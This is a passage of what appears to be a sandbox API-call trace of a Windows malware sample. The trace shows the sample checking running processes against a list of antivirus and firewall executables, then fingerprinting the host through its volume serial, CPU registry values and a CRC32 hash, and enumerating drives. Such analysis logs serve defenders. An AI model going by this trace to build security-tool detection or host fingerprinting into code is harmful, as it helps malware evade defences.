lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="Mcshield.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="avengine.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="cmdagent.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="smc.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="persfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="pccpfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="cfp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="msmpeng.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.227] GetLastError () returned 0x0 [0060.227] lstrcmpiW (lpString1="AVP.EXE", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="ekrn.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="avgnt.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="ashDisp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="Mcshield.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="avengine.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="cmdagent.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="smc.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="persfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="pccpfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="cfp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] lstrcmpiW (lpString1="msmpeng.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.227] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.228] GetLastError () returned 0x0 [0060.228] lstrcmpiW (lpString1="AVP.EXE", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="ekrn.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="avgnt.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="ashDisp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="Mcshield.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="avengine.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="cmdagent.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="smc.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="persfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="pccpfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="cfp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] lstrcmpiW (lpString1="msmpeng.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.228] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.229] GetLastError () returned 0x0 [0060.229] lstrcmpiW (lpString1="AVP.EXE", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="ekrn.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="avgnt.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="ashDisp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="Mcshield.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="avengine.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="cmdagent.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="smc.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="persfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="pccpfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="cfp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] lstrcmpiW (lpString1="msmpeng.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.229] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.230] GetLastError () returned 0x0 [0060.230] lstrcmpiW (lpString1="AVP.EXE", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="ekrn.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="avgnt.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="ashDisp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="Mcshield.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="avengine.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="cmdagent.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="smc.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="persfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] lstrcmpiW (lpString1="pccpfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.230] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0060.231] GetLastError () returned 0x0 [0060.231] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.231] GetLastError () returned 0x0 [0060.231] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.232] GetLastError () returned 0x0 [0060.232] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0060.232] GetLastError () returned 0x0 [0060.232] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x678, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.233] GetLastError () returned 0x0 [0060.233] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x77c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0060.234] GetLastError () returned 0x0 [0060.234] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0060.235] GetLastError () returned 0x0 [0060.235] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0060.235] GetLastError () returned 0x0 [0060.235] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0060.236] GetLastError () returned 0x0 [0060.236] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0060.236] GetLastError () returned 0x0 [0060.236] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0060.237] GetLastError () returned 0x0 [0060.237] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="relationshipcoleman.exe")) returned 1 [0060.238] GetLastError () returned 0x0 [0060.238] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="recorder.exe")) returned 1 [0060.238] GetLastError () returned 0x0 [0060.238] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shift.exe")) returned 1 [0060.239] GetLastError () returned 0x0 [0060.239] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolute.exe")) returned 1 [0060.239] GetLastError () returned 0x0 [0060.239] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strategic.exe")) returned 1 [0060.240] GetLastError () returned 0x0 [0060.240] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="outcomes israeli runtime.exe")) returned 1 [0060.240] GetLastError () returned 0x0 [0060.240] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="collecting_vb_les.exe")) returned 1 [0060.241] GetLastError () returned 0x0 [0060.241] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="hazards.exe")) returned 1 [0060.242] GetLastError () returned 0x0 [0060.242] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="radarunderground.exe")) returned 1 [0060.242] GetLastError () returned 0x0 [0060.242] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nc-statements-inventory.exe")) returned 1 [0060.243] GetLastError () returned 0x0 [0060.243] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="returned.exe")) returned 1 [0060.243] GetLastError () returned 0x0 [0060.243] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sweden.exe")) returned 1 [0060.245] GetLastError () returned 0x0 [0060.245] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachesprocessingculture.exe")) returned 1 [0060.246] GetLastError () returned 0x0 [0060.246] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="regulatory chevy.exe")) returned 1 [0060.246] GetLastError () returned 0x0 [0060.246] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="junctionbaseballsurname.exe")) returned 1 [0060.247] GetLastError () returned 0x0 [0060.247] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="boundary.exe")) returned 1 [0060.247] GetLastError () returned 0x0 [0060.247] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gaps.exe")) returned 1 [0060.248] GetLastError () returned 0x0 [0060.248] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rings_ownership_printable.exe")) returned 1 [0060.248] GetLastError () returned 0x0 [0060.248] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reefpunishmentcooking.exe")) returned 1 [0060.249] GetLastError () returned 0x0 [0060.249] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ellen rw monica.exe")) returned 1 [0060.250] GetLastError () returned 0x0 [0060.250] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="skip-agreements-muscle.exe")) returned 1 [0060.250] GetLastError () returned 0x0 [0060.250] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="starts.exe")) returned 1 [0060.251] GetLastError () returned 0x0 [0060.251] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="different-ill.exe")) returned 1 [0060.251] GetLastError () returned 0x0 [0060.252] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0060.252] GetLastError () returned 0x0 [0060.252] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sstojx.exe")) returned 1 [0060.253] GetLastError () returned 0x0 [0060.253] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.253] GetLastError () returned 0x0 [0060.253] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.254] GetLastError () returned 0x0 [0060.254] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0060.254] GetLastError () returned 0x0 [0060.254] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0060.255] VirtualFree (lpAddress=0x1df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.255] CloseHandle (hObject=0x138) returned 1 [0060.255] VirtualFree (lpAddress=0x1de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.255] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000 [0060.255] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000 [0060.255] GetWindowsDirectoryW (in: lpBuffer=0x1df0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0060.256] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1df0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x1df0600, lpMaximumComponentLength=0x1df0608, lpFileSystemFlags=0x1df0604, lpFileSystemNameBuffer=0x1df0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1df0600*=0xd2ca4def, lpMaximumComponentLength=0x1df0608*=0xff, lpFileSystemFlags=0x1df0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0060.256] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.256] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f7ac | out: phkResult=0x19f7ac*=0x138) returned 0x0 [0060.256] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.256] RegQueryValueExW (in: hKey=0x138, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x1df060c, lpcbData=0x19f79c*=0x80 | out: lpType=0x0, lpData=0x1df060c*=0x49, lpcbData=0x19f79c*=0x52) returned 0x0 [0060.256] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.256] RegCloseKey (hKey=0x138) returned 0x0 [0060.256] lstrlenW (lpString="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 40 [0060.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.257] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f7ac | out: phkResult=0x19f7ac*=0x138) returned 0x0 [0060.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.257] RegQueryValueExW (in: hKey=0x138, lpValueName="Identifier", lpReserved=0x0, lpType=0x0, lpData=0x1df065c, lpcbData=0x19f79c*=0x80 | out: lpType=0x0, lpData=0x1df065c*=0x49, lpcbData=0x19f79c*=0x4a) returned 0x0 [0060.257] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.257] RegCloseKey (hKey=0x138) returned 0x0 [0060.257] wsprintfW (in: param_1=0x1de0000, param_2="%d" | out: param_1="-758493713") returned 10 [0060.257] lstrcatW (in: lpString1="-758493713", lpString2="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHzIntel64 Family 6 Model 94 Stepping 3" | out: lpString1="-758493713Intel (R) Core(TM) i5-7500 CPU @ 3.40GHzIntel64 Family 6 Model 94 Stepping 3") returned="-758493713Intel (R) Core(TM) i5-7500 CPU @ 3.40GHzIntel64 Family 6 Model 94 Stepping 3" [0060.257] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x776b0000 [0060.257] GetProcAddress (hModule=0x776b0000, lpProcName="RtlComputeCrc32") returned 0x776d6b10 [0060.257] lstrlenW (lpString="-758493713Intel (R) Core(TM) i5-7500 CPU @ 3.40GHzIntel64 Family 6 Model 94 Stepping 3") returned 86 [0060.257] RtlComputeCrc32 (PartialCrc=0x29a, Buffer=0x1de0000, Length=0xac) returned 0x998a2f45 [0060.257] VirtualFree (lpAddress=0x1df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.258] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000 [0060.258] GetDriveTypeW (lpRootPathName="A:\\") returned 0x1 [0060.258] GetDriveTypeW (lpRootPathName="B:\\") returned 0x1 [0060.258] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.258] lstrcatW (in: lpString1="", lpString2="C:" | out: lpString1="C:") returned="C:" [0060.258] lstrcatW (in: lpString1="C:", lpString2="FIXED" | out: lpString1="C:FIXED") returned="C:FIXED" [0060.258] lstrcatW (in: lpString1="C:FIXED", lpString2="_" | out: lpString1="C:FIXED_") returned="C:FIXED_" [0060.258] GetDiskFreeSpaceW (in: lpRootPathName="C:\\", lpSectorsPerCluster=0x19f874, lpBytesPerSector=0x19f83c, lpNumberOfFreeClusters=0x19f878, lpTotalNumberOfClusters=0x19f87c | out: lpSectorsPerCluster=0x19f874, lpBytesPerSector=0x19f83c, lpNumberOfFreeClusters=0x19f878, lpTotalNumberOfClusters=0x19f87c) returned 1 [0060.258] lstrlenW (lpString="C:FIXED_") returned 8 [0060.258] wsprintfW 